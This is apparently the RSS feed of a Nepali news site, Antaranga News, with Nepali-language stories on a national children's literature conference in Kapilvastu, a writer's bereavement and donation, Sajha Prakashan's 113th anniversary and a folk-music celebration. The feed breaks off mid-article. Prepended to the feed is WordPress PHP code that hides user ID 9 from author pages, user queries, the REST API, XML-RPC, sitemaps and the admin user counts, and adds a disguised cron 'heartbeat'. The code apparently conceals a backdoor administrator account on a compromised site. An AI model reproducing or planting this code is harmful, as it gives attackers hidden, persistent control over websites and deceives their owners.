add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
कविता – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
News from Gandaki ProvinceWed, 22 Jul 2026 08:03:58 +0000en-US
hourly
1 https://wordpress.org/?v=7.0.2https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpgकविता – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
3232३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ कपिलवस्तुमा : दुई दिने कार्यक्रमको तयारी सुरु
https://www.antaranganews.com/?p=50229
https://www.antaranganews.com/?p=50229#respondWed, 22 Jul 2026 01:36:35 +0000https://www.antaranganews.com/?p=50229तिलौराकोट (कपिलवस्तु)– नेपाल बालसाहित्य समाजको ३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ कपिलवस्तुको यहाँ दुई दिने कार्यक्रमका साथ हुने भएको छ । सम्मेलनको तयारी सुरु भएको आयोजक समितिले प्रेस वक्तव्य जारी गर्दै साउन ३ गते जानकारी दिएको हो ।
सो राष्ट्रिय सम्मेलन आगामी मंसिर ११ र १२ गते तिलौराकोटको पावन काखमा भव्य रूपमा सम्पन्न हुन गइरहेको व्यहोरा यहाँहरू सबैलाई जानकारी गराउँदछौँ । तिलौराकोटको ऐतिहासिक माटोको सुगन्ध, बुद्धकालीन शान्तिको दर्शन र आधुनिक बाल सिर्जनशीलताको अनुपम त्रिवेणी बन्ने उक्त गरिमामय कार्यक्रममा राष्ट्रिय तथा अन्तर्राष्ट्रियस्तरका विज्ञहरू, स्रष्टाहरू र बालबालिकाहरूको उपस्थिति रहनेछ । प्राचीन कालमा सिद्धार्थ गौतमले बाल्यकाल बिताएको यसै भूमिबाट वर्तमानका बालबालिकाको सिर्जनात्मक र बौद्धिक क्षमतालाई उजागर गर्दै मौलिक एवं रैथाने बालसाहित्यको संरक्षण गर्ने ऐतिहासिक अवसरका रूपमा यस सम्मेलनलाई लिइएको छ । यस ३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३ लाई भव्य र ऐतिहासिक रूपमा सफल पार्नका लागि आवश्यक स्रोत सङ्कलन, व्यवस्थापन तथा पूर्वतयारीका कार्यहरू द्रुत गतिमा अघि बढिरहेको बताइएको छ ।
स्थानीय मूल आयोजक समिति, कपिलवस्तुका संयोजक मिनराज बेल्वासेले दस्तखत गर्नु भएको प्रेस वक्तव्यमा सम्मेलनका बारेमा जानकारी दिइएको हो । स्थानीय मूल आयोजक समिति, कपिलवस्तुको आयोजनामा हुन लागेको यस सम्मेलनले बाल साहित्यको विकाससँगै कपिलवस्तुको ऐतिहासिक, पुरातात्त्विक, सांस्कृतिक तथा पर्यटकीय महत्वलाई राष्ट्रिय तथा अन्तर्राष्ट्रिय स्तरमा उजागर गर्ने महत्वपूर्ण अवसर प्रदान गर्नेछ ।
जारी प्रेस वक्तव्यमा नेपाल बालसाहित्य समाजको ऐतिहासिक पृष्ठभूमि सहित वि.सं. २०४४ सालमा स्थापित भएको बताइएको छ । सो सम्मेलनमा आयोजक संस्थाले बालसाहित्यिक आफ्नो स्थापना कालदेखि नै बालबालिका तथा किशोर किशोरीहरूको लेखनकला र सिर्जनशीलताका साथसाथै पठन संस्कार र संस्कृतिको विकासका लागि विभिन्न सङ्घसंस्थाहरूसँग सहकार्य गर्दै नेपालका विभिन्न स्थानहरूमा राष्ट्रिय बालसाहित्य सम्मेलन आयोजना गर्दै आएको जनाएको छ ।
सा वक्तव्यमा शान्तिका अग्रदूत शाक्यमुनि बुद्धले आफ्नो जीवनका अमूल्य २९ वर्ष बिताउनुभएको, बाल्यकालीन क्रीडा गर्नुभएको, प्रारम्भिक शिक्षा आर्जन गर्नुभएको र मानव कल्याणका लागि महाभिनिष्क्रमण (ज्ञानको खोजीमा गृहत्याग) गर्नुभएको ऐतिहासिक, पुरातात्विक तथा पावन भूमि कपिलवस्तुको तिलौराकोट दरबार क्षेत्रमा नेपाल बालसाहित्य समाजले ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’ आयोजना गर्ने गौरवमय निर्णय गरेको उल्लेख छ । प्राचीन शाक्य गणराज्यको राजधानी तथा बुद्धकालीन ज्ञान र सभ्यताको केन्द्रका रूपमा रहेको यस ऐतिहासिक पर्यटकीय एवम् आध्यात्मिक स्थलमा देशभरका र एशीया क्षेत्रका बालसाहित्य अनुरागी, स्रष्टाहरू तथा बालबालिकाहरूलाई स्वागत गर्न पाउनु हाम्रा लागि अहोभाग्यको हो वक्तव्यमा भनिएको छ । सम्मेलनको उद्देश्य :
भगवान् गौतमबुद्धको बाल्यकाल तथा किशोरावस्थासँग जोडिएको ऐतिहासिक प्राचीन कपिलवस्तु (तिलौराकोट) को पवित्र भूमिमा आयोजना हुन लागेको यस सम्मेलनले साहित्य, इतिहास र पर्यटनलाई एउटै साझा मञ्चमा जोड्नेछ। गौतमबुद्धको क्रीडास्थलका रूपमा परिचित तिलौराकोट, बुद्धसँग सम्बन्धित महत्वपूर्ण स्थल कुदान, नेपाली साहित्यका विशिष्ट साधक साहित्यकार भवानी भिक्षुको जन्मभूमि तथा कपिलवस्तुका अन्य ऐतिहासिक, पुरातात्त्विक र सांस्कृतिक सम्पदाहरूलाई बाल साहित्यको सिर्जनात्मक संसारसँग जोड्दै यस क्षेत्रको महत्वलाई विश्वसामु प्रस्तुत गर्ने सम्मेलनको उद्देश्य रहेको उल्लेख छ ।
बाल साहित्यको माध्यमबाट बालबालिकामा सिर्जनशीलता, कल्पनाशक्ति, नैतिक चेतना, मानवीय मूल्य, सामाजिक उत्तरदायित्व तथा विश्वबन्धुत्वको भावना विकास गर्ने उद्देश्यका साथ आयोजना हुन लागेको यस सम्मेलनमा नेपालका विभिन्न क्षेत्र तथा एसियाली मुलुकहरूबाट बाल साहित्यकार, लेखक, शिक्षाविद्, अनुसन्धानकर्ता, शिक्षक, विद्यार्थी तथा साहित्यप्रेमीहरूको सहभागिता रहने अपेक्षा गरिएको छ । सम्मेलनको मूल उद्देश्य सात :
सम्मेलनको मूल उद्देश्यलाई सात बुँदामा उल्लेख गरिएको छ । स्थानीय बालबालिका, किशोरकिशोरी, शिक्षक, अभिभावक, साहित्यकार, कलाकारलगायत देश तथा विदेशबाट पाल्नुहुने दिग्गज सर्जकहरूको उपस्थितिमा सम्पन्न हुने ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’का मुख्य उद्देश्यहरू निम्नअनुसार रहेका छन् वक्तव्यमा भनिएको छ । ती हुन् ः
१) बालबालिका तथा किशोर किशोरीको लेखनकला, सिर्जनशीलता र सिप विकासमा टेवा पुरÞ्याउने ।
२) बालसाहित्यबारे शिक्षक, अभिभावक तथा विद्यार्थीहरूमा अभिरुचि र चेतना अभिवृद्धि गर्ने ।
३) बालबालिका तथा किशोरकिशोरीहरूमा साहित्यिक विभिन्न विधाहरूमध्ये कथा र कविता लेखन तथा वाचन, चित्रकला, अभिनय आदिको सिप विकास तथा क्षमता अभिवृद्धि गर्ने ।
४) पठन सीप र संस्कारको विकास गर्ने ।
५) पुस्तकालय व्यवस्थापन, पुस्तक प्रकाशनबारे बालबालिकालाई हौसला र उत्प्रेरणा दिने ।
६) नेपाली बालपुस्तकहरूबारे जानकारी दिने ।
७) स्थानीय सांस्कृतिक धरोहर, पुरातात्विक महत्त्व र मौलिक एवम् रैथाने बालसाहित्यको संरक्षण गर्ने ।
कपिलवस्तु र कपिलवस्तुवासीको प्रतिष्ठा र गौरवको विषय बनेको यो ऐतिहासिक सम्मेलनलाई सभ्य, भव्य र व्यवस्थित बनाउने उद्देश्यले मिति २०८२ चैत्र २१ गते भृकुटी सामुदायिक सिकाइ केन्द्रको बैठकले एक स्थानीय मूल आयोजक समिति गठन गरी आफ्ना कार्य सम्पादन गरिरहेको छ । सम्मेलनलाई सभ्य, भव्य र व्यवस्थित बनाउन पत्रकार सम्मेलन मार्फत जानकारी गराइन्छ । बाल साहित्यको वर्तमान अवस्था, सम्भावना र चुनौतीको खोजी :
बाल साहित्य बालबालिकाको मनोरञ्जनको माध्यम मात्र नभई उनीहरूको व्यक्तित्व विकास, संस्कार निर्माण, कल्पनाशीलता, सिर्जनात्मकता, वैज्ञानिक सोच र सामाजिक चेतना विकास गर्ने महत्वपूर्ण आधार हो । यसै मान्यतालाई आत्मसात् गर्दै सम्मेलनमा बाल साहित्यको वर्तमान अवस्था, सम्भावना र चुनौती, शिक्षासँगको सम्बन्ध, प्रविधिको प्रभाव तथा अन्तर्राष्ट्रिय सहकार्यका विविध विषयमा विमर्श, संवाद, सिर्जनात्मक प्रस्तुति तथा साहित्यिक गतिविधिहरू सञ्चालन हुने जानकारी वक्तव्यमाफर्त दिइएको छ । सम्मेलनमा हुने मुख्यमुख्य कार्यक्रमहरू :
मङ्सिर ११ र १२ गते हुने दुई दिने ‘३१ औँ राष्ट्रिय बालसाहित्य सम्मेलन– २०८३’ अन्तर्गत सम्पन्न गरिने मुख्यमुख्य कार्यक्रमहरू समेत वक्तव्यमै जानकारी दिइएको छ ।
उक्त सम्मेलनमा हुने कार्यशालामा १) बालकथा लेखन कार्यशाला, २) कविता लेखन कार्यशाला, ३) निबन्ध लेखन कार्यशाला, ४) समीक्षा लेखन कार्यशाला, ५) चित्रकला लेखन कार्यशाला, ६) हस्तलेखन कार्यशाला, ७) अभिनय प्रशिक्षण कार्यशाला, ८) नृत्य प्रशिक्षण कार्यशाला र ९) देवनागरी लिपिमा हस्तलेखन हुने भनिएको छ ।
साथमा विषयक्षेत्रमा बालबालिका केन्द्रित कार्यक्रमहरूको प्रस्तुति रहने समेत वक्तव्यमार्फत जानकारी दिइएको छ । ती हुन् ः क) कथा प्रस्तुति, ख) कविता प्रस्तुति, ग) निबन्ध प्रस्तुति, घ) चित्र प्रदर्शनी, ङ) नृत्य प्रस्तुति, च) अभिनय प्रस्तुति छ) हस्तलिपि प्रदर्शनी आदि छन् ।
यसैगरी, उक्त अवसरमा बीचबीचमा बालबालिका केन्द्रित कार्यक्रमहरूको प्रस्तुति रहने जानकारी दिदै तिनमा क) कथा प्रस्तुति, ख) कविता प्रस्तुति, ग) निबन्ध प्रस्तुति, घ) चित्र प्रदर्शनी, ङ) नृत्य प्रस्तुति, च) अभिनय प्रस्तुति, छ) हस्तलिपि प्रदर्शनी रहेको उल्लेख छ । कुल खर्च करिब १२ लाख रुपैयाँ लाग्ने आंकलन :
उक्त सम्मेलन सम्पन्न गर्नका लागि कुल खर्च करिब १२ लाख रुपैयाँ लाग्ने अनुमान गरिएको छ, जसमध्ये ७ लाख समाजको केन्द्र र ५ लाख स्थानीय आयोजकले व्यवस्थापन गर्नुपर्ने बताइएको छ । एसियाका विभिन्न ७ देशबाट १५ जना र ५० जना देशभरिका विशिष्ट साहित्यकार, कलाकारहरू र पाँच सय जना विद्यार्थीहरूले भाग लिने :
उक्त सम्मेलनमा एसियाका विभिन्न ७ देशबाट १५ जना र ५० जना देशभरिका विशिष्ट साहित्यकार, कलाकारहरू तथा कपिलवस्तु जिल्लाका करिब पाँच सय जना विद्यार्थीहरूले भाग लिने साहित्यिक इतिहासको कालखण्डमा विरलै हुने जिल्लाको यो ऐतिहासिक सम्मेलन केवल बालसाहित्य वा सिर्जना क्षेत्रका लागि मात्र नभई सिङ्गो कपिलवस्तु र कपिलवस्तुवासीको गौरवको कार्यक्रम भएकाले यसमा हामी सबैको इज्जत र प्रतिष्ठा जोडिएको समाजद्वारा जारी वक्तव्यमा उल्लेख छ ।
सो सम्मेलनमा देशका विभिन्न भाग तथा एसियाली मुलुकहरूबाट आउने सहभागीहरूले तिलौराकोट, कुदान, भवानी भिक्षुको जन्मभूमि लगायतका ऐतिहासिक तथा सांस्कृतिक स्थलहरूको अवलोकन गर्ने अवसर प्राप्त गर्ने भएकाले सम्मेलन कपिलवस्तुको पर्यटन प्रवर्धनका दृष्टिले पनि महत्वपूर्ण रहने बताइएको छ ।
यस सम्मेलनले कपिलवस्तुको ऐतिहासिक तथा पुरातात्त्विक महत्वलाई राष्ट्रिय तथा अन्तर्राष्ट्रियस्तरमा थप परिचित गराउनुका साथै साहित्यिक, सांस्कृतिक तथा ऐतिहासिक पर्यटनको विकास र प्रवर्धनमा समेत महत्वपूर्ण योगदान पु¥याउनुका साथै यस पवित्र तिलौराकोटलाई विश्व सम्पदा सूचीमा सूचीकृतको लागि टेवा पुग्ने अपेक्षा गरिएको जारी वक्तव्यमा भनिएको छ ।
गौतमबुद्धको बाल्यकालसँग सम्बन्धित प्राचीन कपिलवस्तुको ऐतिहासिक विरासत,विश्व रामसार सूचीमा सूचीकृत जगदिशपुर सिमसार क्षेत्रको अद्वितीय प्राकृतिक सौन्दर्य, साहित्यकार भवानी भिक्षुको साहित्यिक योगदान तथा कुदानलगायतका महत्वपूर्ण सम्पदाहरूलाई बाल साहित्यको सिर्जनात्मक संसारसँग जोड्दै आयोजना हुन लागेको यो सम्मेलनले कपिलवस्तुको इतिहास, साहित्य, संस्कृति र पर्यटनलाई विश्वमञ्चमा प्रस्तुत गर्ने महत्वपूर्ण आधार निर्माण गर्ने विश्वास गरिएको छ । यस सम्मेलनको सफल आयोजनाका लागि स्थानीय मूल आयोजक समिति, कपिलवस्तुले नेपाल सरकार, प्रदेश सरकार, स्थानीय तह, पुरातत्व तथा पर्यटन क्षेत्रसँग सम्बन्धित निकाय, साहित्यिक तथा शैक्षिक संस्था, सञ्चारमाध्यम, साहित्यकार, शिक्षक, अभिभावक, विद्यार्थी तथा सम्पूर्ण साहित्यप्रेमी महानुभावहरूमा सक्रिय सहयोग, सहभागिता र सहकार्यका लागि हार्दिक आह्वान गर्दछ वक्तव्यमा उल्लेख छ । रमेशचन्द्र घिमिरेको सहयोगमा ।
]]>
https://www.antaranganews.com/?feed=rss2&p=502290साहित्यकार सुरज उपाध्यायको परिवारद्वारा भेटीको रकम बालगृहलाई
https://www.antaranganews.com/?p=38755
https://www.antaranganews.com/?p=38755#respondWed, 04 Mar 2026 13:37:44 +0000https://www.antaranganews.com/?p=38755पोखरा, फागुन २० गते । साहित्यकार सुरज उपाध्यायको परिवारले आफ्ना पिता शङ्कर उपाध्यायको निधन भएपछि सङ्कलित भेटीको रकमबाट बालगृहमा अक्षयकोष स्थापना गरेको छ ।
बुधवार स्याङ्जाको फेदीखोला गाउँपालिका–२, आरुखर्क, चनौटेमा १३ दिनको शुद्धाशुद्धिकै दिन पिताप्रति श्रद्धास्वरूप प्राप्त रकमबाट १ लाख १०१ रुपियाँको अक्षयकोषका लागि रकम फेदीखोला–१ मा सञ्चालित अमोर सेवा नेपाल नामक बालगृहका लागि प्रदान गरिएको हो । साहित्यकार उपाध्यायसहित आमा रमादेवी सुवेदी, भाइहरू रेशम र सन्तोष उपाध्याय तथा बहिनी सङ्गीताले संयुक्त रूपमा सो बालगृहकी प्रबन्धक कमला पराजुलीलाई रकम हस्तान्तरण गरे ।
बुबाको सम्मानस्वरूप प्राप्त रकम पुण्य कर्ममै प्रयोग गर्ने हेतुले बालगृहका बालबालिकालाई सहयोग हुने गरी रकम हस्तान्तरण गरिएको साहित्यकार उपाध्यायले बताए । उनले बुबाकै स्मृतिमा गाउँको किरियापुत्रीका लागि सहयोग पुग्ने गरी सार्वजनिक धारा निर्माण गर्ने पनि सो अवसरमा जानकारी दिए ।
२०६८ सालदेखि सञ्चालित बालगृहमा हाल ४६ जना बालबालिका आश्रित रहेका बालगृहकी संस्थापक तथा प्रबन्धक कमला पराजुलीले जानकारी दिइन् । ‘चिल उड्यो आकाशमा’, ‘साइकल’, ‘बाबा कतारमा आमा हतारमा’ लगायत कृतिका स्रष्टा उपाध्यायका पिता शङ्करको गत फागुन ८ गते ७५ वर्षको उमेरमा हृदयघातका कारण निधन भएको थियो । निवृत्त शिक्षक स्वर्गीय उपाध्यायले करिब ४० वर्ष अध्यापन गरेका थिए ।
]]>
https://www.antaranganews.com/?feed=rss2&p=387550साहित्यकार सुरज उपाध्यायलाई पितृशोक
https://www.antaranganews.com/?p=38551
https://www.antaranganews.com/?p=38551#respondFri, 20 Feb 2026 12:30:10 +0000https://www.antaranganews.com/?p=38551पोखरा, फागुन ८ गते । साहित्यकार सुरज उपाध्यायलाई पितृशोक परेको छ । उपाध्यायका ७५ वर्षीय पिता शङ्कर उपाध्यायको शुक्रवार बिहान हृदयघातका कारण निधन भएको हो ।
केही समयअगि क्यान्सरका कारण थलिएका उपाध्याय शल्यक्रियापछि स्वास्थ्य लाभ गरी फेदीखोला-२, चनौटे, स्याङ्जामा बस्दै आएका थिए । हाल सामान्य स्वास्थ्य अवस्था भएका उनी शुक्रवार बिहान घरायसी नियमित काम सकेपछि एक्कासि ढल्न पुगेका थिए । उनलाई पोखरास्थित गण्डकी मेडिकल कलेजमा ल्याइए पनि चिकित्सकले हृदयघातका कारण निधन भएको जानकारी दिएका थिए ।
२००८ साल मङ्सिर १६ गते जन्मेका उपाध्याय ४० वर्षसम्म विभिन्न विद्यालयमा अध्यापन गरी निवृत्त भएका शिक्षक हुन् । उपाध्यायका जेठा छोरा सुरज साहित्यिक क्षेत्रमा क्रियाशील छन् । विशेष गरी बालसाहित्यमा क्रियाशील सुरजका ‘चिल उड्यो आकाशमा’, ‘साइकल’ र ‘बाबा कतारमा आमा हतारमा’ गरी ३ बालकविता सङ्ग्रह तथा ‘तिम्रो मन फर्किएन’ नामक गजल सङ्ग्रह प्रकाशित छन् । उनी प्रगतिशील लेखक सङ्घ, गण्डकी प्रदेशका सचिवालय सदस्य तथा गीतकार प्रतिष्ठानका सदस्य हुन् । स्व. उपाध्यायका सुरजसहित सन्तोष र रेशम गरी ३ छोरा, १ छोरी र श्रीमती छन् ।
]]>https://www.antaranganews.com/?feed=rss2&p=385510साझा प्रकाशनले मनायो ११३औँ वार्षिकोत्सव
https://www.antaranganews.com/?p=38497
https://www.antaranganews.com/?p=38497#respondSun, 15 Feb 2026 12:21:05 +0000https://www.antaranganews.com/?p=38497पुलचोक(ललितपुर)– साझा प्रकाशनले आफ्नो गौरवमय इतिहासलाई जोड्दै ११३औँ वार्षिकोत्सव मनाएको छ । अभिलेख तथा ऐतिहासिक कागजातहरूको अध्ययनपछि अबदेखि १९९० फागुन २ गते गोरखा भाषा प्रकाशिनी समिति स्थापना भएकोले फागुन २ गतेलाई नै निरन्तरताको आधार मानेर स्थापना दिवस मनाइने प्रकाशनले जनाएको हो ।
साहित्यकार माया ठकुरीको प्रमुख आतिथ्यतामा भएको उक्त कार्यक्रममा उहाँले संस्था पुनः सम्हालिँदै अघि बढिरहेकोमा खुशी व्यक्त गर्नु भयो । उहाँले कर्मचारीहरूको निष्ठा र प्रतिबद्धताको खुलेर प्रशंसा गर्दै भन्नुभयो, ‘साझा प्रकाशनले बिस्तारै लय समातिरहेको छ । यस संस्थाले गुणस्तरीय प्रकाशन, सम्पादन, डिजाइन तथा पाठकमैत्री स्वरूपमा अझ ध्यान दिन उहाँको आग्रह थियो । पुस्तकहरूको अक्षर आकार सानो भएको गुनासो गर्दै त्यसमा सुधार अपेक्षित रहेको धारणा उहाँले राख्नुभयो ।
कार्यक्रममा साझा प्रकाशन प्राज्ञिक सल्लाहकार समितिका संयोजक डा. तुलसीप्रसाद भट्टराईले यो निर्णयले संस्थाको इतिहासलाई संस्थागत, प्रमाणित र गौरवपूर्ण बनाएको बताउनुभयो । उहाँले अब साझा प्रकाशनले आफ्नो यात्रालाई स्पष्ट ऐतिहासिक आधारसहित अघि बढाउने बाटो पाएको छ । उहाँले भन्नुभयो, ‘आजबाट हामीले साझा ११३औँ वर्षमा पुगेको सामूहिक बोध गरेका छौँ ।’
सल्लाहकार एवम् पूर्व प्रमुख निर्वाचन आयुक्त दिनेशकुमार थपलियाले यति लामो विरासत बोकेको संस्थालाई वर्तमान पुस्तासँग जोड्दै कसरी जीवन्त राख्ने भन्ने विषयमा व्यापक बहस आवश्यक रहेको उल्लेख गर्नुभयो । रणनीतिक योजना, व्यावसायिक दक्षता र स्रष्टाको सहभागिताबाट मात्र संस्था बलियो बन्ने उहाँको भनाइ थियो । आफू साझा प्रकाशनका पुस्तक पढेर हुर्केको उल्लेख गर्दै उहाँले ‘साझा प्रकाशन नेपाली भाषा र साहित्यको स्पन्दन हो’ भन्नुभयो ।
अध्यक्ष शेखर गिरीले अभिलेख खोजी र अध्ययनबाट संस्थाको इतिहासलाई नयाँ ढंगले पुनःस्थापित गरिएको जानकारी दिनुभयो । साझा प्रकाशन अब ११३ वर्षे परम्परासँग जोडिएको प्राज्ञिक संस्थाका रूपमा उभिएको उहाँको दावी थियो । कुनै मन्दिरको बाहिरी रूप हेरेर मात्र त्यसको वास्तविकता थाहा हुँदैन, गर्भगृहमा पुगेपछि मात्रै थाहा हुन्छ भन्ने उदाहरण दिँदै उहाँले भन्नुभयो, ‘हामीले पनि साझा प्रकाशनको गर्भगृह खोज्दा गोरखा भाषा प्रकाशिनी समिति भेट्यौँ ।’ आगामी दिनमा संस्था सुधार, पूर्वाधार विकास, प्रकाशन विस्तार र बजार प्रतिस्पर्धामा उभिन सरकारको सहयोग आवश्यक रहने उहाँले उल्लेख गर्नुभयो ।
निमित्त महाप्रबन्धक भेषराज घिमिरेले ऐतिहासिक तथ्य प्रस्तुत अब हरेक वर्ष फागुन २ मा स्थापना दिवस मनाइने जानकारी दिनुभयो ।
स्थापनाकालदेखि नै यस संस्थामा पुष्कर शमशेर राणा, लक्ष्मीप्रसाद देवकोटा, बालकृष्ण सम, भीमनिधि तिवारी र माधवप्रसाद घिमिरेजस्ता अग्रणी स्रष्टाहरूको प्रत्यक्ष संलग्नता रहेको स्मरण कार्यक्रममा गरिएको थियो । अक्षरमार्फत नेपाली वाङ्मयको विकास, विस्तार र उन्नयनमा साझा प्रकाशनले उच्च भूमिका निर्वाह गर्दै आएको वक्ताहरूले बताएका छन् ।
यो संस्थालाई नेपालको इतिहासमा सबैभन्दा लामो समयदेखि क्रियाशील प्रकाशन संस्थामध्ये एक मानिन्छ निमित्त महाप्रबन्धक भेषराज घिमिरेले बताउनु भयो । उहाँका अनुसार साझा प्रकाशन नेपाली भाषा, साहित्य, कला, संस्कृति र शिक्षाको प्रवद्र्धनमा लामो समयदेखि सक्रिय रहँदै आएको संस्था हो ।
]]>https://www.antaranganews.com/?feed=rss2&p=384970ठाडोभाका महानायक ‘धम्पु’को हीरक शुभ जन्मोत्सवमा रथयात्रा सहित अभिनन्दन गर्ने निर्णय
https://www.antaranganews.com/?p=38118
https://www.antaranganews.com/?p=38118#respondThu, 29 Jan 2026 06:31:38 +0000https://www.antaranganews.com/?p=38118बेसीशहर(लमजुङ)– ठाडोभाका लोककला प्रतिष्ठान नेपालले आफ्ना संरक्षक एवम् ठाडोभाका महानायक बुद्धिमान दुरा ‘धम्पु’को हीरक शुभ जन्मोत्सवका अवसरमा रथयात्रा सहित अभिनन्दन गर्ने निर्णय गरेको छ । प्रतिष्ठानको यहाँ सम्पन्न बैठकले सो निर्णय माघ १४ गते गरेको हो । रथयात्रा कार्यक्रम महानायक ‘धम्पु’को शुभ जन्म दिन आउँदो बैशाख ५ गते हुने भएको छ ।
रथयात्रा पछि अयोजना हुने सभामा उहाँका सदम्पतीलाई अभिनन्दन गर्ने, धम्पुको विविध व्यक्तित्व झल्कने ‘हीरक पुरुष गाथा’ अर्थात अभिनन्दन ग्रन्थको विमोचन गर्ने निर्णय भएको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले बताउनु भएको छ । उहाँका अनुसार सो ग्रन्थमा धम्पुलाई नजिकबाट चिन्ने विभिन्न क्षेत्रका महानुभावहरूले उहाँलाई के कसरी चिन्नु हुन्छ ? शब्दमा लेखेर आउँदो फागुन मसान्तसम्म आइपुग्ने गरी आयोजक प्रतिष्ठानमा पठाउन अनुरोध गर्ने निर्णय भएको छ ।
साथै, सो दिन रथयात्राका साथमा लमजुङका विभिन्न स्थान तथा अन्य जिल्लाबाट आएका ठाडोभाकाका टोलीहरूले आ–आफ्नो संस्थाको व्यानर सहित ठाडोभाका गाउँदै बेसीशहर बजार परिक्रमा गरिने तय भएको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले जानकारी दिनुभयो । उहाँका अनुसार यो संयोग र थप खुशीको विषय हो कि ! हामीले प्रतिष्ठानको दशौं स्थापना दिवसमा संरक्षक एवम महानायकको रथयात्रा गर्ने अवसर पाएका छौं । पहाडीले भन्नुभयो, ‘यो कार्य सम्पूर्ण कलाकार त्यसमा पनि मौलिक लोककला कर्मीहरूका लागि गौरवको विषय हो, सबैले होस्ते, हैसे गरी ऐतिहासिक रुपमा सफल बनाउन आह्वान गर्दछौं ।’
यो पुण्यकर्ममा लोक कलाकार तथा कलाकर्मीहरू कोही नछुटुन् भन्ने हाम्रो चाहना छ । हामी सबैमा मन, बचन, कर्मले सहयोगका लागि अपिल गर्दछौं । हाम्रो प्रतिष्ठान गैरनाफा मूलक संस्था भएको हुँदा यो पुण्यकर्ममा यदि कसैले नगद सहयोग गर्न चाहनु हुन्छ भने पनि हामी स्वागत गर्नेछौं अध्यक्ष पहाडीले भन्नुभयो । उहाँका अनुसार दाताहरूलाई प्रतिष्ठानका नाउँमा रहेको बैंक खातामा वा प्रतिष्ठानको नगदी रसिद लिएर मात्र नगद रकम दिनका लागि अनुरोध गर्ने निर्णय भएको छ । खाली हात अर्थात सहयोग रकम प्रतिष्ठानका कोही पनि व्यक्ति अध्यक्षलाई समेत बिना रसिद रकम नदिन समेत आह्वान गर्दछौं अध्यक्ष पहाडीले बताउनु भयो । चौथोे अधिवेशन तथा चौथो ठाडोभाका मेला एक साथ :
ठाडोभाका लोककला प्रतिष्ठान नेपालको चौथो अधिवेशन र चौथो ठाडोभाका मेला यो वर्ष एक साथ हुने भएको छ । प्रतिष्ठानको चौथोे अधिवेशन तथा चौथो ठाडोभाका मेला आउँदो चैत महिनामा हुने भएको हो । हरेक वर्ष माघ महिनामा मनाइने स्थापना दिवस र सो अवसरमा सञ्चालन गरिने ठाडोभाका मेला यो वर्ष निर्वाचन आचारसंहिताको कारणले चैतामा सार्ने निर्णय माघ १४ गते सम्पन्न बैठकले गरेको हो ।
यसअघि माघको १५– १७ गते ठाडोभाका मेला र साथमा अधिवशेन समेत गर्ने निर्णय गरिएको थियो । तर माघ ४ गतेदेखि निर्वाचन आचारसंहिता लागू भएको र त्यसले सार्वजनिक भेला गर्न रोकेको हुँदा त्यो स्थितिलाई ध्यानमा राखेर अधिवेशन सहितको मेला चैतको २०, २१ र २२ गतेका दिन गर्ने निर्णय गरिएको हो । स्मारिका र पिन प्रकाशन गर्ने :
